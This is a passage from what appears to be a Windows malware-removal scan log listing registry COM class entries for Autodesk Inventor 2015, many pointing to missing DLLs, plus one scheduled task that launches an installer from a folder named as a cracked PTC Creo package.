    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{38C8B14E-7879-4DA9-8C3F-8CAAC359293A}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{3C3F63EA-C7BA-11d4-8E60-0010B541CD80}\localserver32 -> C:\Program Files\Autodesk\Inventor 2015\Compatibility\Bin\DbxBridge.exe (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{3FC94EB5-AEBD-4f3f-A2A4-B6CE57113C01}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\RxAppDocView.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{3FCEB42C-9B98-486A-BED7-FD7F3ADB7291}\InprocServer32 -> AcETransmit.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{40770568-0D5E-49D4-BE47-BC47A4F0B0A4}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{44A52280-AE56-490D-890C-89FB7279ED6B}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{45122C53-8483-4b62-B15A-EAA9FE5FC3D5}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{46C56738-39C6-4240-8B9B-008CCD769A84}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{47179DDE-10AC-4737-97C9-8CE5379343EA}\InprocServer32 -> AcETransmit.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{475C7B4A-6964-4F9E-9708-05A16EAC31D0}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{48270F9E-CCF6-4C79-B6FF-267C960E6425}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{48FEFCD7-5D7C-4E4A-9F11-60E69A31D4B1}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{49998808-648A-4A9C-A7A5-B1672775D9AB}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{4A756F5F-CBA4-428B-B17F-AF80C0C8502D}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{4B40437B-8972-4444-BBE3-1588FF55F203}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{4BD03680-3C0F-4501-AFF7-3D008586917F}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{4C80573A-9150-11d2-B772-0060B0F159EF}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\RxAppDocView.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{4D29B490-49B2-11D0-93C3-7E0706000000}\localserver32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\Inventor.exe (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{4E6F2E83-E7F0-4333-9772-875EB733C820}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\RxTest.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{5544903C-2CCC-487C-91BB-F310B72A8E9B}\InprocServer32 -> AcETransmit.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{59A224A2-BEF8-4C89-96E0-83A5411ABB6C}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{622F6193-E4DD-46E6-BC66-2ED88E9FD28D}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{62FBB030-24C7-11D3-B78D-0060B0F159EF}\localserver32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\Inventor.exe (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{644190AE-BD8F-493F-B63D-C79404AC5E07}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{6451051B-AD22-4C6A-ACCE-013A0E1DDBC3}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{64B99FDB-1D85-447F-98C7-569DBDA723DB}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{6BCE6F6E-C050-4F39-BD98-E2743949F724}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{6F56D7C9-18DD-4C15-9FA8-C54E3610EC40}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{6FDE7A70-351B-11d6-988B-0010B57A8BB7}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\DtBridge.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{6FDE7A71-351B-11d6-988B-0010B57A8BB7}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\DtBridge.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{6FDE7A72-351B-11d6-988B-0010B57A8BB7}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\DtBridge.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{6FDE7A73-351B-11d6-988B-0010B57A8BB7}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\DtBridge.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{6FDE7A74-351B-11d6-988B-0010B57A8BB7}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\DtBridge.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{6FDE7A77-351B-11d6-988B-0010B57A8BB7}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\DtCp.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{70DBCAE8-8C2B-450C-9E1D-43E4686C6512}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{713C0E8A-5AE8-4695-B442-5ED6C4FE5C42}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{7293E009-3015-4AD3-96EC-D42C36B5FCE3}\InprocServer32 -> AcETransmit.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{72EC5CC5-88F3-45B1-A865-0A327DF58CC8}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{72EFC580-D085-4B81-8C55-26A79E445338}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{750AEC19-2E4C-4ED9-9B9F-F9CAFCD060F3}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{76283A80-50DD-11D3-A7E3-00C04F79D7BC}\localserver32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\Inventor.exe (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{794199C5-827C-41C8-8CB2-3A1EA056AF5E}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{798391FE-4AF2-4851-9DDA-1F0D70C02A9E}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{7BA16B3F-1AB3-4BD7-B959-52C4B8504EE9}\InprocServer32 -> AcInetUI.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{7C239DAB-BC87-45F3-B7B1-FCC1541A235B}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{81D07C3D-0350-11D3-B7C2-0060B0EC020B}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\RxAppCtrl.Ocx (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{834CE679-2E47-49DE-9E41-FEC87E9192EB}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{8421A29C-54B8-11D1-9837-0060B03C43C8}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\SolidObject.Dll ()
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{846217D0-8954-11D2-8DCD-0060B0C32531}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\UCxTextBtn.Ocx (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{846217D1-8954-11D2-8DCD-0060B0C32531}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\UCxTextBtn.Ocx (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{849AFB5B-D6C9-4924-A712-F7118FF9611F}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{85452F88-5071-492E-B850-2E3C586DCBD8}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{87F5CF8F-A06D-498F-A05F-E520E6B570DB}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{89F0FC31-3B1D-494B-A75B-6BD4FA527B8A}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{8AA16DFC-DFC6-4B51-8FA2-A5D812BE33BF}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{8B0E6BD9-610C-11D1-9842-0060B03C43C8}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\SolidObject.Dll ()
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{8C23B656-4E6E-4B45-9920-9617168D39A3}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\TestServer.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{8ED07FEF-E1B0-4CC3-B2BA-D354828AB952}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{97E17F04-17DF-11d5-BC38-0010B5891E89}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\BodyReceiver.dll ()
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{988F4102-E6E3-4282-ACAC-55270827F2A8}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{9906CDFC-DB2C-4126-9422-13139B148495}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{9A21C6C5-27FC-4442-8590-575E7AFD73BB}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{9ECF83FB-23C5-43B6-83DE-93CFBDD74D4A}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{A58F47CC-FF65-4152-B0B1-666C643A5BFC}\InprocServer32 -> AcETransmit.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{A6A3D586-44CF-44C2-A92C-620BB713B4F2}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{ABBE3F83-D585-4A50-9B69-198B0F566F2E}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{AC5CECFA-F03A-41D2-A89C-704C44935941}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{B1560245-190E-4BBD-81DF-9B642D0E5325}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{B2A579E0-A797-40B1-8AEE-A8F6404719F8}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{B47196BC-D4AB-41BB-A771-543D67CFC9F5}\InprocServer32 -> AcETransmit.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{B53CEF4B-1A13-49DE-BBC5-A7100FB2F38C}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{B5EE2B68-9A23-4BCD-BB77-FEA6DFB24DD6}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{B6B5DC40-96E3-11d2-B774-0060B0F159EF}\localserver32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\Inventor.exe (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{B80687F9-FA4C-4735-9DC4-E5715F2BC698}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{B8E7214B-25CA-4116-84CB-E86FB9625B36}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{BAE5802A-CF21-4F9C-AE04-D98F4036AC31}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{BBF6A206-CB04-479D-96AE-349E1E83319A}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{BBF9FDF1-52DC-11D0-8C04-0800090BE8EC}\localserver32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\Inventor.exe (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{BC71DEA1-D6FB-48B8-AB06-D151C81BBCDD}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{BE54741D-E02B-4572-93D6-105AF4EDE777}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{BF224DC3-B602-4EEE-BFE9-9E4E0AED6837}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{BF4CC07E-E9BB-40D6-873F-855B211033B9}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{C061C82C-D041-4214-BB07-B608107CEFCB}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{C2D4ACCC-A3D1-4A0A-AD59-0DD8BA3D5EE1}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{C343ED84-A129-11d3-B799-0060B0F159EF}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\RxApprenticeServer.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{C8C18F89-794D-466B-8B97-95634D9890EF}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{C8EC7647-1E79-4F13-81D7-2EED803D0D22}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{C92F8F8C-8B2C-11d4-B872-0060B0EC020B}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\DtBridge.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{CC23CA32-9892-4FBA-A108-FE31CA0F35A6}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{CD865713-70D6-4E15-BB7B-9B99AD9DEB85}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{CFEE2BAF-14F9-4D23-853D-B6E2BCC14263}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{D56F5AB3-9C4D-4F1A-A851-A671D9FE8C22}\InprocServer32 -> AcETransmit.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{D66873EA-AAE5-41CC-8DD2-8CE3228E9F89}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{D7A1987D-4A73-11D1-9A4B-080009DCE505}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ColorButton.Ocx (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{D7A1987E-4A73-11D1-9A4B-080009DCE505}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ColorButton.Ocx (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{D86B6C47-11F2-4D95-B635-EA575F0892FC}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{DA1F437C-9BD9-11d4-B87C-0060B0EC020B}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\DtBridge.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{DB207560-8449-4FAF-BDC2-61676EB012D4}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{DB5D476B-3FF4-4E9D-A606-1E2B473BE571}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\AcInetUI.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{DCA7356C-FF94-4b20-AE04-7AA6A8E14117}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{DDA9A20F-5B56-49F5-9465-CE82FC199352}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{DE6B563C-B074-4BF1-A8A0-B3FED8703E99}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{DE74F5AD-DA2F-429F-BAF9-850A2808D585}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{DF6525C2-6358-4B07-813D-708120C5FE1A}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{E177A457-9EAA-43C3-A3CE-84874A28F6CA}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{E1C85E9F-60B2-4007-80C3-2C5E09474C3B}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\RxInventorUtilities.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{E29F6C45-6927-4508-8F3F-34105FD3FC5F}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{E4222C78-3670-4BB1-9AD4-7D8F3E581F2D}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{E5B0515D-48D2-4F04-906D-0192ED65A2DD}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\TestServer.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{E60F81E1-49B3-11D0-93C3-7E0706000000}\localserver32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\Inventor.exe (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{E70DE962-842A-4488-9481-1D0FD72A020F}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{E9C07CEC-7B82-49E4-BBA2-7533B88E9D64}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{EA34A0C0-5CE7-4701-A6FA-117D25CD5EBB}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{EF01D98A-747B-4522-AD70-991B90855DBF}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{F13E75B9-6AF6-49CB-80B3-6D2FF6E09932}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{F196F03F-651A-43AF-BE34-D11942F24445}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{F2D4F4E5-EEA1-46FF-A83B-A270C92DAE4B}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\DTInterop.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{F2DB0EE3-7137-4CB0-8349-483C4FF2143A}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{F40E2FF0-4D77-40B2-9A44-A3AEECCE8EFF}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{F5522F0C-962A-48AC-9992-E81B07628F1F}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{F61064CC-DBFB-47ee-9BC8-CA5A1CBDF0DA}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\InvResc.dll (Autodesk)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{F78DCF7C-043D-45FC-9D21-676FC307BA3F}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{F868EAEC-1B73-4F5E-BA73-90EBA94E75BE}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{FA62F626-EBD5-4dc5-B970-D9E81E0E20E0}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{FA97F7A7-FD19-4D55-ABF2-CFEFFF777426}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{FB469644-3F14-4403-ACCA-6B13486FF7BD}\localserver32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\InvTXTStack.exe (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{FD51ED8A-D518-4554-B236-B6E9D234FD03}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{FD703B01-4362-423E-9BDB-91BDCB16C1C9}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\DTInterop.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{FE054BB2-AF94-40AC-88AA-2F59F7018B1D}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{FE317223-8EDE-4684-B424-E48B9EA90220}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{FE718E8F-C3AA-4F30-9103-432450CF1DA1}\InprocServer32 -> axdb.dll => No File

    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {0B574DF1-B938-44EC-809D-DC10D6D1506D} - System32\Tasks\{8EFAA458-F192-4393-9B47-876FBFD29F95} => pcalua.exe -a "E:\SW\PTC Creo 2.0 F000 Win32 + Win64 Multilanguage with crack + HelpCenter\PTC_Creo_2.0_F000_HelpCenter_Multilanguage\setup.exe" -d "E:\SW\PTC Creo 2.0 F000 Win32 + Win64 Multilanguage with crack + HelpCenter\PTC_Creo_2.0_F000_HelpCenter_Multilanguage"
